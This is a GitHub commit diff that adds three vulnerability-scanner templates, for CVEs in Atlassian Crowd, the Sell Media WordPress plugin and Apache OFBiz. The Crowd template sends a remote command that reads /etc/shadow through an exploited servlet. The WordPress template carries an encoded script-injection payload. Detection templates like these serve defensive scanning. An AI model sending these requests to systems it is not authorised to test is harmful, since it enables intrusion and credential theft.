File tree Expand file tree Collapse file tree 3 files changed +123
-0
lines changed
Expand file tree Collapse file tree 3 files changed +123
-0
lines changed Original file line number Diff line number Diff line change 1+ id : CVE-2019-11580
2+
3+ info :
4+ name : Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
5+ author : dwisiswant0
6+ severity : critical
7+
8+ # Atlassian Crowd and Crowd Data Center
9+ # had the pdkinstall development plugin incorrectly enabled in release builds.
10+ # Attackers who can send unauthenticated or authenticated requests
11+ # to a Crowd or Crowd Data Center instance can exploit this vulnerability
12+ # to install arbitrary plugins, which permits remote code execution on
13+ # systems running a vulnerable version of Crowd or Crowd Data Center.
14+ # All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
15+ # from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
16+ # from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
17+ # from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
18+ # and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
19+ # -
20+ # References:
21+ # > https://github.com/jas502n/CVE-2019-11580
22+
23+ requests :
24+ - method : GET
25+ path :
26+ - " {{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
27+ - " {{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
28+ matchers-condition : and
29+ matchers :
30+ - type : word
31+ words :
32+ - " root:*:"
33+ - " bin:*:"
34+ condition : and
35+ part : body
36+ - type : status
37+ status :
38+ - 200
Original file line number Diff line number Diff line change 1+ id : CVE-2019-6112
2+
3+ info :
4+ name : WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
5+ author : dwisiswant0
6+ severity : medium
7+
8+ # A Cross-site scripting (XSS) vulnerability
9+ # in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
10+ # allows remote attackers to inject arbitrary web script or HTML
11+ # via the keyword parameter (aka $search_term or the Search field).
12+ # --
13+ # References:
14+ # > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
15+
16+ requests :
17+ - method : GET
18+ path :
19+ - " {{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
20+ matchers-condition : and
21+ matchers :
22+ - type : word
23+ words :
24+ - " id=\" sell-media-search-text\" class=\" sell-media-search-text\" "
25+ - " alert(1337)"
26+ condition : and
27+ part : body
28+ - type : status
29+ status :
30+ - 200
Original file line number Diff line number Diff line change 1+ id : CVE-2020-9496
2+
3+ info :
4+ name : Apache OFBiz XML-RPC Java Deserialization
5+ author : dwisiswant0
6+ severity : medium
7+
8+ # This temaplte detects a Java deserialization vulnerability in Apache
9+ # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
10+ # versions prior to 17.12.04.
11+ # --
12+ # References:
13+ # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
14+
15+ requests :
16+ - raw :
17+ - |
18+ POST /webtools/control/xmlrpc HTTP/1.1
19+ Host: {{Hostname}}
20+ Origin: http://{{Hostname}}
21+ Content-Type: application/xml
22+
23+ <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
24+
25+ - |
26+ POST /webtools/control/xmlrpc HTTP/1.1
27+ Host: {{Hostname}}:8080
28+ Origin: http://{{Hostname}}:8080
29+ Content-Type: application/xml
30+
31+ <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
32+
33+ - |
34+ POST /webtools/control/xmlrpc HTTP/1.1
35+ Host: {{Hostname}}:8443
36+ Origin: https://{{Hostname}}:8443
37+ Content-Type: application/xml
38+
39+ <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
40+ matchers-condition : and
41+ matchers :
42+ - type : word
43+ words :
44+ - " faultString"
45+ - " No such service [ProjectDiscovery]"
46+ - " methodResponse"
47+ condition : and
48+ part : body
49+ - type : word
50+ words :
51+ - " Content-Type: text/xml"
52+ part : header
53+ - type : status
54+ status :
55+ - 200
You can’t perform that action at this time.
0 commit comments